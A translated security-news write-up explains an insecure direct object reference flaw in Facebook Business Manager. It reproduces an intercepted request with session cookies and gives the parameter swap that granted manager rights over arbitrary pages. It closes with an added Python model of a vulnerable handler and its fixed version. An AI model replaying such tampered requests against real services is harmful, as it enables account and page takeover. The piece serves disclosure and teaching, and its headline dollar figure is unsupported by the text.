Hack any Facebook page within ten seconds? This vulnerability turned out to be worth 1.6 million dollars - vulnerability analysis - vulnerability warning - the black bar safety net

2016-09-20T00:00:00
ID MYHACK58:62201679425
Type myhack58
Reporter Anonymous
Modified 2016-09-20T00:00:00

Description

How would you hack Facebook? A security researcher from India has something to say about that. According to recent foreign media reports, an Indian security researcher named Arun Sureshkumar found a serious vulnerability in Facebook's "Business Manager" platform, and an attacker could exploit it to take over anyone's Facebook page.

What is Facebook Business Manager? The "Business Manager" platform lets companies, advertising agencies and marketing staff manage a company's Facebook pages, ad accounts and payment methods centrally from a single interface, sparing managers the awkwardness of constantly switching between interfaces.

Large enterprises usually own more than one Facebook fan page, and each of these pages has its own market positioning and target audience. For business managers, Business Manager lets them manage all of their fan pages and ad accounts from the same interface; beyond that, they can also view, remove or change the corresponding user permissions. Each Facebook fan page manager can log in to Business Manager and directly access the various details of the ad accounts and pages. Employers are not shown the manager's full Facebook profile, only their name, company name and ad account information, so managers do not have to worry about adding their work contacts as Facebook friends.

Insecure direct object reference

Before the technical analysis of this attack, allow me to first introduce the concept of an "insecure direct object reference". According to the definition provided by the OWASP project (the Open Web Application Security Project), when a web application gives a user direct access to an object based on user-supplied input, that is an insecure direct object reference.
This vulnerability allows an attacker to bypass the system's authentication mechanisms and directly access all of the system's resources. According to the information provided by the OWASP project: "Insecure direct object references allow an attacker to bypass the system's authentication mechanism and directly access system resources by modifying the parameter values that reference objects. These resources may be other users' data in the database, or files stored in the file system. If the web application hands the user the requested object directly, without any security testing of the user's input, this unsafe situation arises."

Facebook vulnerability analysis

Sureshkumar found an IDOR (Insecure Direct Object Reference) vulnerability in Facebook's Business Manager, and with this vulnerability he could obtain control of any Facebook page in ten seconds. Using his Facebook account with ID 907970555981524, Sureshkumar added a test account as a partner account; the partner account's ID was 991079870975788. During testing he used Burp Suite to intercept Facebook's network requests and modify part of the request data. The request data Sureshkumar published in his analysis report was:

POST /business_share/asset_to_agency/?dpr=2 HTTP/1.1
Host: business.facebook.com
Connection: close
Content-Length: 436
Origin: https://business.facebook.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://business.facebook.com/settings/pages/536195393199075?business_id=907970555981524
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
Cookie: rc=2; datr=AWE3V–DUGNTOAy0wTGmpAXb; locale=en_GB; sb=BWE3V1vCnlxJF87yY9a8WWjP; pl=n; lu=gh2GPBnmZY1B1j_7J0Zi3nAA; c_user=100000771680694; xs=25%3A5C6rNSCaCX92MA%3A2%3A1472402327%3A4837; fr=05UM8RW0tTkDVgbSW.AWUB4pn0DvP1fQoqywWeORlj_LE.BXN2EF.IL.FfD.0.0.BXxBSo.AWXdKm2I; csm=2; s=Aa50vjfSfyFHHmC1.BXwxOY; _ga=GA1.2.1773948073.1464668667; p=-2; presence=EDvF3EtimeF1472469215EuserFA21B00771680694a2estatefdutf1472469215051cechfdp_5f1b00771680694f7cc; act=1472469233458%2F6

parent_business_id=907970555981524&agency_id=991079870975788&asset_id=536195393199075&role=MANAGER&__user=100000771680694&__a=1&__dyn=aKU-XxaAcoaucCJDzopz8aWKFbGEW8UhrWqw-xG2G4aK2i8zFE8oqCwkoSEvmbgcFV8Smqvuzxeuw4ohaxwdwsdbzovu-eBCy8b48xicx2aGewzwEx2qEN4yECcKbby9onwfwhcbxungxkdaw&__req=e&__be=-1&__pc=PHASED%3Abrands_pkg&fb_dtsg=AQHoLGh1HUmf%3AAQGT4fDF1-nQ&ttstamp=265817211176711044972851091025865817184521026870494511081&__rev=2530733

With this request data in hand, how is a Facebook page attacked? He replaced the value of the "asset_id" parameter in the request with the ID of the target Facebook page, and then swapped the values of "parent_business_id" and "agency_id". In addition, he set the "role" parameter value to "MANAGER":

parent_business_id=991079870975788
agency_id=907970555981524
asset_id=190313461381022
role=MANAGER

After the series of operations above, Sureshkumar demonstrated how to attack a Facebook page and obtain administrator privileges over that page in Business Manager. Sureshkumar also posted a demo video of the attack.
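As an added example (not code from the article or from Facebook), here is a minimal Python model of the /business_share/asset_to_agency/ handler: a vulnerable version that accepts any asset_id as long as the caller administers parent_business_id, beside a fixed version with the ownership check that closes the hole. The ID tables, request bodies and handler names are constructed for the example; the page-owning business and its admin are made up.

```python
from urllib.parse import parse_qs

# Constructed fixture (not real Facebook data). IDs mirror those quoted in the
# article; business 555000111222333 and admin "999" (target page owner) are made up.
BUSINESS_ADMINS = {
    "907970555981524": {"100000771680694"},  # researcher's business
    "991079870975788": {"100000771680694"},  # researcher's partner/test business
    "555000111222333": {"999"},              # unrelated business owning the target page
}
BUSINESS_ASSETS = {
    "907970555981524": {"536195393199075"},
    "555000111222333": {"190313461381022"},
}
# Constructed bodies modelled on the article's request, relevant fields only.
LEGIT_BODY = ("parent_business_id=907970555981524&agency_id=991079870975788"
              "&asset_id=536195393199075&role=MANAGER")
TAMPERED_BODY = ("parent_business_id=991079870975788&agency_id=907970555981524"
                 "&asset_id=190313461381022&role=MANAGER")

class Forbidden(Exception):
    """Raised when the authorization check rejects the request."""

def _fields(body):
    return {k: v[0] for k, v in parse_qs(body, strict_parsing=True).items()}

def asset_to_agency_vulnerable(session_user, body):
    """Checks only that the caller administers parent_business_id; nothing ties
    asset_id to that business, so any page can be handed to the chosen agency."""
    p = _fields(body)
    if session_user not in BUSINESS_ADMINS.get(p["parent_business_id"], set()):
        raise Forbidden("caller does not administer parent_business_id")
    return (p["asset_id"], p["agency_id"], p["role"])  # grant that would be persisted

def asset_to_agency_fixed(session_user, body):
    """Same handler with the missing ownership check added."""
    p = _fields(body)
    parent = p["parent_business_id"]
    if session_user not in BUSINESS_ADMINS.get(parent, set()):
        raise Forbidden("caller does not administer parent_business_id")
    if p["asset_id"] not in BUSINESS_ASSETS.get(parent, set()):
        raise Forbidden("asset_id is not owned by parent_business_id")
    return (p["asset_id"], p["agency_id"], p["role"])

def rejects(handler, session_user, body):
    try:
        handler(session_user, body)
    except Forbidden:
        return True
    return False
```

The tampered body passes the vulnerable handler because the researcher really does administer the business named in parent_business_id; the fixed handler refuses it because that business does not own the page.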
